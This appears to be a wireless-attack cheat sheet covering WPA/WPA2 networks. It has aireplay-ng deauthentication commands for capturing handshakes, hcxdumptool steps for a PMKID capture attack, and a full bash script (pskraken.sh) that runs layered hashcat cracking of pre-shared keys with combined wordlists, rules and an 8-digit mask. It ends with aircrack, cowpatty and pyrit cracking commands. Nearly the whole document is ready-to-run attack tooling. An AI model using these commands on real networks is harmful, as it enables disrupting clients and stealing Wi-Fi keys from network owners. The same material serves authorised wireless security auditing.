WPA/WPA2

Standard approach - No roaming

Deauthenticate a supplicant
aireplay-ng -0 20 -a <ap_mac> -c <supplicant_mac> <wlan1mon>

1. Deauthenticating with the broadcast address can be very efficient and convenient.
2. Airodump should then report “WPA Handshake”.

Roaming - PMKID attack

It only works against APs that support roaming.

Installation
apt install libssl-dev libz-dev libpcap-dev libcurl4-openssl-dev
cd /opt
git clone https://github.com/ZerBea/hcxdumptool.git
cd hcxdumptool
make
make install
cd /opt
git clone https://github.com/ZerBea/hcxtools.git
cd hcxtools
make
make install
cd /opt
Attack
1.Traffic capture

Opportunistic attack without mac filtering

hcxdumptool -o <pmkid.pcap> -i <wlan1mon> --filtermode=2 --enable_status=3

Target one or more BSSID

Write one or more BSSIDs to a file, with all characters in uppercase and without any separator (remove every “:”).
Example: 50D72257AC2F

hcxdumptool -o <pmkid.pcap> -i <wlan1mon> --filterlist=<mac.txt> --filtermode=2 --enable_status=3
2.PCAP to hashes
hcxpcaptool -z <out.hashes> <pmkid.pcap>
3.Crack

Solution 1
WPA-PMKID-PBKDF2 (16800)

Solution 2

hcxpcaptool -o <hccapx.hashes> <pmkid.pcap>

WPA-PMKID-PBKDF2 (2500)

Cracking with a crackstation

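#!/bin/bash
#
# pskraken.sh - PMKID (hashcat mode 16800) cracking pipeline for a crackstation.
#
# Usage:  time ./pskraken.sh lower_dico.txt separator.txt
#   $1  custom wordlist, one candidate per line, first letter in lowercase
#   $2  file containing one separator per line
#
# Reads:  out.hashes (the hcxpcaptool -z output) from the current directory.
# Writes: derived wordlists (*_dico.txt, *_separated*.txt) and out.pot in the
#         current directory. out.pot holds recovered PSKs in cleartext, so the
#         script lowers the umask before creating anything.
#
# NOTE: "set -e" is deliberately NOT used. hashcat exits non-zero when a pass
# is merely exhausted without a crack, and that must not abort the remaining
# passes. Only the input checks in main() are fatal.
set -u

readonly COMBINATOR=/var/app/hashcat-utils/bin/combinator.bin
readonly RULES_DIR=/var/rules
readonly DICO_DIR=/var/dico/Small
readonly HASHES=out.hashes
readonly POTFILE=out.pot
readonly HASH_MODE=16800   # WPA-PMKID-PBKDF2

die() {
  printf 'error: %s\n' "$*" >&2
  exit 1
}

usage() {
  printf 'Usage: %s <lower_wordlist> <separator_file>\n' "${0##*/}" >&2
  exit 2
}

#######################################
# Crack the PMKID hashes with candidates read from stdin.
# Globals:   HASH_MODE, POTFILE, HASHES (read)
# Returns:   hashcat's exit status (non-zero when exhausted; not fatal)
#######################################
crack_stdin() {
  hashcat -m "$HASH_MODE" --potfile-path "$POTFILE" "$HASHES"
}

#######################################
# Crack the PMKID hashes with a wordlist and a rule file from RULES_DIR.
# Arguments: $1 - wordlist path, $2 - rule file name (relative to RULES_DIR)
#######################################
crack_wordlist() {
  local wordlist=$1 rule=$2
  hashcat -m "$HASH_MODE" --potfile-path "$POTFILE" "$HASHES" "$wordlist" -r "$RULES_DIR/$rule"
}

#######################################
# Build the capitalised copy of the wordlist and the 2- and 3-word
# concatenations (ll, lu, ul, uu, lll, ull, uuu).
# Globals:   lower_dico (read), COMBINATOR (read)
#######################################
combine() {
  echo "Combining..."
  # \U is a GNU sed extension: upper-case the first character of each line.
  sed 's/^\(.\)/\U\1/' "$lower_dico" > upper_dico.txt
  "$COMBINATOR" "$lower_dico" "$lower_dico" > ll_dico.txt
  "$COMBINATOR" "$lower_dico" upper_dico.txt > lu_dico.txt
  "$COMBINATOR" upper_dico.txt "$lower_dico" > ul_dico.txt
  "$COMBINATOR" upper_dico.txt upper_dico.txt > uu_dico.txt
  # sort -u replaces the original "cat | sort | uniq" pipeline.
  sort -u ll_dico.txt lu_dico.txt ul_dico.txt uu_dico.txt > concatenated.txt   # Wifikey KeyWifi
  "$COMBINATOR" ll_dico.txt "$lower_dico" > lll_dico.txt    # wifikeymobile
  "$COMBINATOR" ul_dico.txt "$lower_dico" > ull_dico.txt    # Wifikeymobile
  "$COMBINATOR" uu_dico.txt upper_dico.txt > uuu_dico.txt   # WifiKeyMobile
}

#######################################
# For every separator in the separator file, build the "Word<sep>word"
# variants. hashcat's -j '$X' rule appends X to the left-hand word.
# Globals:   lower_dico, separators (read)
#######################################
separate() {
  local sep
  echo "Separating..."
  # read -r keeps backslashes; the || clause handles a missing final newline.
  while IFS= read -r sep || [[ -n "$sep" ]]; do
    [[ -n "$sep" ]] || continue   # blank lines are not separators
    hashcat -a 1 upper_dico.txt "$lower_dico" -j "\$${sep}" --stdout > "ul_separated${sep}.txt"   # Wifi-key
    hashcat -a 1 upper_dico.txt upper_dico.txt -j "\$${sep}" --stdout > "uu_separated${sep}.txt"   # Wifi-Key
    hashcat -a 1 "$lower_dico" "$lower_dico" -j "\$${sep}" --stdout > "ll_separated${sep}.txt"   # wifi-key
    hashcat -a 1 upper_dico.txt "uu_separated${sep}.txt" -j "\$${sep}" --stdout > "uuu_separated${sep}.txt"   # Wifi-Key-Mobile
    printf '[+] Separated with %s\n' "$sep"
  done < "$separators"
}

#######################################
# Cheap passes first: the custom wordlists with the rule sets.
# Globals:   lower_dico, RULES_DIR (read)
#######################################
crack_quick() {
  local dico rule
  echo "Quick Win Cracking"
  for dico in "$lower_dico" upper_dico.txt concatenated.txt lll_dico.txt ull_dico.txt; do
    hashcat --stdout "$dico" -r "$RULES_DIR/OneRuleToRuleThemAll.rule" | crack_stdin
    hashcat --stdout "$dico" -r "$RULES_DIR/append-year-n-bang.rule" | crack_stdin
  done
  for rule in best64.rule leetspeak.rule append-year-n-bang.rule; do
    hashcat --stdout uuu_dico.txt -r "$RULES_DIR/$rule" | crack_stdin
  done
}

#######################################
# Passes over the separator variants built by separate(); rule-major order
# (all files with best64, then append-year-n-bang, then leetspeak).
# Globals:   separators, RULES_DIR (read)
#######################################
crack_separated() {
  local sep rule kind
  echo "Cracking with separators"
  while IFS= read -r sep || [[ -n "$sep" ]]; do
    [[ -n "$sep" ]] || continue
    for rule in best64.rule append-year-n-bang.rule leetspeak.rule; do
      for kind in uu ul ll uuu; do
        hashcat --stdout "${kind}_separated${sep}.txt" -r "$RULES_DIR/$rule" | crack_stdin
      done
    done
  done < "$separators"
}

#######################################
# Brute-force pass over 8-digit keys.
#######################################
crack_mask() {
  echo "Cracking 8 digits long"
  hashcat -a 3 -m "$HASH_MODE" --potfile-path "$POTFILE" "$HASHES" ?d?d?d?d?d?d?d?d
}

#######################################
# Passes over the english and french dictionaries, then the custom wordlist
# combined with each of them.
# Globals:   lower_dico, DICO_DIR, COMBINATOR (read)
#######################################
crack_languages() {
  local lang rule
  echo "Cracking based on english and french wordlists"
  for lang in english french; do
    for rule in best64.rule leetspeak.rule append-year-n-bang.rule; do
      crack_wordlist "$DICO_DIR/$lang.txt" "$rule"
    done
  done
  for lang in english french; do
    "$COMBINATOR" "$lower_dico" "$DICO_DIR/$lang.txt" | crack_stdin
  done
}

#######################################
# Passes over the remaining small dictionaries, then the expensive
# OneRuleToRuleThemAll pass over the 3-word variants.
# Globals:   DICO_DIR, RULES_DIR (read)
#######################################
crack_specific() {
  local dico rule
  echo "Cracking based on specific wordlists"
  for dico in rkg.txt cow.txt cnets.txt rockyou.txt; do
    for rule in best64.rule leetspeak.rule; do
      crack_wordlist "$DICO_DIR/$dico" "$rule"
    done
  done
  hashcat --stdout uuu_dico.txt -r "$RULES_DIR/OneRuleToRuleThemAll.rule" | crack_stdin
}

#######################################
# Entry point: validate inputs, then run every stage in order.
# Globals:   lower_dico, separators (written, then read-only)
#######################################
main() {
  (( $# == 2 )) || usage
  [[ -r "$1" ]] || die "cannot read wordlist: $1"
  [[ -r "$2" ]] || die "cannot read separator file: $2"
  [[ -r "$HASHES" ]] || die "cannot read $HASHES in $(pwd)"
  readonly lower_dico=$1
  readonly separators=$2

  # Derived wordlists and the potfile (cleartext PSKs) stay owner-only.
  umask 077

  combine
  separate
  crack_quick
  crack_separated
  crack_mask
  crack_languages
  crack_specific

  #### Result
  echo "Final Result:"
  cat -- "$POTFILE"
}

main "$@"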
Cracking without a crackstation

aircrack

aircrack-ng -w <dico> <cap.pcap>

Rainbow tables - cowpatty

genpmk -f <dico> -d <computed_hashes.txt> -s <essid>
cowpatty -r <cap.pcap> -d <computed_hashes.txt> -2 -s <essid>

GPU - pyrit

pyrit eval
pyrit -i <dico> import_passwords
pyrit -e <essid> create_essid
pyrit batch
pyrit -r <cap.pcap> -b <ap_mac> attack_db
rm -r ~/.pyrit/blobspace

GPU - hashcat

https://hashcat.net/cap2hccapx/
hashcat64.exe -m 2500 -r rules\best64.rule cap\capture.hccapx dict\custom_dict.txt